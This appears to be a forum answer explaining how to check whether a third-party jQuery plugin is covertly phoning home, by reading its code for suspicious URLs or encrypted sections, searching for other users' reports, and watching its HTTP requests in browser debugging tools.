Obviously, your first step should be to read the code. There are a number of tell-tale signs you can look for, including looking for URLs in the code, and any encrypted code.

Of course, some code may be too complex to make this a realistic suggestion, particularly if it’s been minified and obfuscated, but it should be possible to scan through it. If it is doing anything like this, it’ll be using the same functions it uses to communicated with your own site (ie jQuery’s ajax functions), so you won’t see specific function calls that raise suspicion, but suspect URLs in the code should be checked out, and you should definitely avoid encrypted code (obfuscated is generally okay, but not encrypted).

Secondly, search the internet for other people commenting about the plugin. If there is anything untoward happening, its likely that other people will have noticed it. Avoid using plugins that don’t have enough users to get any comments one way or the other.

Finally, use a tool like Firebug to watch for HTTP requests that occur while you’re using a site containing the plugin. If it’s communicating with base, it can’t hide from you; the browser’s debugging tools will happily show you what you need to know.

Hope that helps.